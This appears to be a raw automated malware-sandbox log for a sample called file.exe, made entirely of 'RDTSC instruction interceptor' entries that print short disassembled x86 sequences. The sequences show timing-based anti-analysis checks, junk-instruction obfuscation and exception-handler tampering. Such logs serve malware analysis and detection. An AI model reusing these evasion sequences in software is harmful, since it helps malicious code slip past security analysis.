Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B969 second address: C4B989 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1F18DC15C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c jmp 00007F1F18DC15CEh 0x00000011 pop edi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B989 second address: C4B98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B98F second address: C4B995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4BB29 second address: C4BB2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4BB2D second address: C4BB31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4BCCE second address: C4BCEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e je 00007F1F1851F5D6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4BCEE second address: C4BCF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4BE51 second address: C4BE77 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1F1851F5D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F1F1851F5E2h 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007F1F1851F5D6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4BE77 second address: C4BE7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4BFF1 second address: C4BFF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4BFF5 second address: C4C02B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F18DC15D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F1F18DC15CBh 0x0000000e jg 00007F1F18DC15CEh 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4C1CB second address: C4C1ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1F1851F5E7h 0x00000008 js 00007F1F1851F5D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4C5C1 second address: C4C5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F1F18DC15C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007F1F18DC15CEh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4C5DE second address: C4C5E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4C5E2 second address: C4C615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F1F18DC15D0h 0x0000000e jmp 00007F1F18DC15D8h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4C92F second address: C4C93B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F1F1851F5D6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C40271 second address: C40276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C11FDB second address: C11FDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4CA98 second address: C4CA9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4CA9C second address: C4CAB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5DAh 0x00000007 js 00007F1F1851F5D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4D18B second address: C4D1A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jno 00007F1F18DC15CCh 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4D76D second address: C4D785 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5DEh 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F1F1851F5D6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C16F86 second address: C16F8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C16F8C second address: C16FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F1851F5E1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C16FA1 second address: C16FBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F18DC15D9h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C16FBF second address: C16FC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C50AA3 second address: C50AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1F18DC15CCh 0x0000000a jnl 00007F1F18DC15C6h 0x00000010 jne 00007F1F18DC15C8h 0x00000016 pushad 0x00000017 push esi 0x00000018 pop esi 0x00000019 push edx 0x0000001a pop edx 0x0000001b jns 00007F1F18DC15C6h 0x00000021 popad 0x00000022 popad 0x00000023 jng 00007F1F18DC15DCh 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c pop eax 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C50AD2 second address: C50AD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C50AD6 second address: C50ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C52842 second address: C52850 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1F1851F5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C52D02 second address: C52D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C59224 second address: C59228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C59228 second address: C5922F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5922F second address: C59235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C586AB second address: C586B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5884C second address: C58875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F1851F5E5h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1F1851F5DDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C589EF second address: C589FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F1F18DC15C6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C589FC second address: C58A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1F1851F5D6h 0x0000000a popad 0x0000000b jmp 00007F1F1851F5DEh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C58E27 second address: C58E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5DCF3 second address: C5DCF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5E072 second address: C5E077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5E077 second address: C5E081 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F1F1851F5D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5E1B3 second address: C5E1E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F18DC15D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jmp 00007F1F18DC15CAh 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5E1E0 second address: C5E1E5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5E7CC second address: C5E7EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F18DC15D5h 0x00000009 popad 0x0000000a push eax 0x0000000b push esi 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5E7EB second address: C5E81F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 xchg eax, ebx 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F1F1851F5D8h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 push ebx 0x00000022 mov esi, dword ptr [ebp+122D37B1h] 0x00000028 pop esi 0x00000029 nop 0x0000002a push edx 0x0000002b pushad 0x0000002c push ebx 0x0000002d pop ebx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5ED6C second address: C5ED9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jg 00007F1F18DC15CCh 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1F18DC15D9h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F3AE second address: C5F3E5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F1F1851F5E7h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F1F1851F5E4h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F3E5 second address: C5F3E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F3E9 second address: C5F3ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5FBF0 second address: C5FC00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F18DC15CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C605FF second address: C60603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C60ECB second address: C60EE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 je 00007F1F18DC15C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ecx 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C61726 second address: C6172A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6339F second address: C633C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F18DC15D0h 0x00000007 jmp 00007F1F18DC15D1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C633C4 second address: C633C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C633C9 second address: C633F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007F1F18DC15D7h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jo 00007F1F18DC15C6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C64590 second address: C645BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007F1F1851F5D6h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C65058 second address: C6505C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6505C second address: C650A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F1F1851F5D8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 sub dword ptr [ebp+122D1843h], ebx 0x0000002d push 00000000h 0x0000002f mov esi, dword ptr [ebp+122D2EF3h] 0x00000035 push 00000000h 0x00000037 movsx edi, ax 0x0000003a xchg eax, ebx 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C650A4 second address: C650A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C66F34 second address: C66F39 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6749F second address: C6753B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1F18DC15D9h 0x00000008 jmp 00007F1F18DC15D3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F1F18DC15C8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000019h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a or dword ptr [ebp+1245A28Bh], ebx 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007F1F18DC15C8h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 00000015h 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c push edx 0x0000004d mov edi, dword ptr [ebp+122D3911h] 0x00000053 pop edi 0x00000054 push 00000000h 0x00000056 call 00007F1F18DC15D6h 0x0000005b jmp 00007F1F18DC15D0h 0x00000060 pop edi 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6753B second address: C6753F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6753F second address: C67549 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1F18DC15C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6866B second address: C6867C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1F1851F5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6867C second address: C68681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6B4EA second address: C6B54B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b jng 00007F1F1851F5D8h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F1F1851F5D8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov ebx, dword ptr [ebp+1248A00Eh] 0x00000033 push 00000000h 0x00000035 xchg eax, esi 0x00000036 jmp 00007F1F1851F5DEh 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F1F1851F5DBh 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6B54B second address: C6B551 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6A747 second address: C6A7E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebx 0x00000009 call 00007F1F1851F5D8h 0x0000000e pop ebx 0x0000000f mov dword ptr [esp+04h], ebx 0x00000013 add dword ptr [esp+04h], 0000001Bh 0x0000001b inc ebx 0x0000001c push ebx 0x0000001d ret 0x0000001e pop ebx 0x0000001f ret 0x00000020 mov bx, 67B7h 0x00000024 push dword ptr fs:[00000000h] 0x0000002b push 00000000h 0x0000002d push ebp 0x0000002e call 00007F1F1851F5D8h 0x00000033 pop ebp 0x00000034 mov dword ptr [esp+04h], ebp 0x00000038 add dword ptr [esp+04h], 00000014h 0x00000040 inc ebp 0x00000041 push ebp 0x00000042 ret 0x00000043 pop ebp 0x00000044 ret 0x00000045 mov dword ptr fs:[00000000h], esp 0x0000004c mov bx, si 0x0000004f mov eax, dword ptr [ebp+122D161Dh] 0x00000055 jnp 00007F1F1851F5D8h 0x0000005b mov ebx, ecx 0x0000005d push FFFFFFFFh 0x0000005f adc bx, 0081h 0x00000064 nop 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 jmp 00007F1F1851F5E5h 0x0000006d jmp 00007F1F1851F5E8h 0x00000072 popad 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6B551 second address: C6B55C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F1F18DC15C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6A7E8 second address: C6A800 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1F1851F5DDh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6C577 second address: C6C57C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6B661 second address: C6B66F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6C57C second address: C6C583 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6B66F second address: C6B673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6C583 second address: C6C5D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 jmp 00007F1F18DC15D2h 0x0000000d push 00000000h 0x0000000f sub dword ptr [ebp+12489583h], eax 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F1F18DC15C8h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 sub dword ptr [ebp+12493083h], ebx 0x00000037 xchg eax, esi 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6C5D3 second address: C6C5E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F1851F5E0h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6C5E8 second address: C6C5EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6C5EE second address: C6C5F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6C5F2 second address: C6C605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F1F18DC15D0h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6D673 second address: C6D6D7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F1F1851F5E0h 0x0000000f jmp 00007F1F1851F5E1h 0x00000014 popad 0x00000015 nop 0x00000016 mov bx, di 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+1245FEB3h], esi 0x00000021 mov dword ptr [ebp+122D350Eh], ecx 0x00000027 push 00000000h 0x00000029 mov bx, di 0x0000002c xchg eax, esi 0x0000002d jc 00007F1F1851F5E4h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 jg 00007F1F1851F5D6h 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6C7E2 second address: C6C7E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6D6D7 second address: C6D6DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
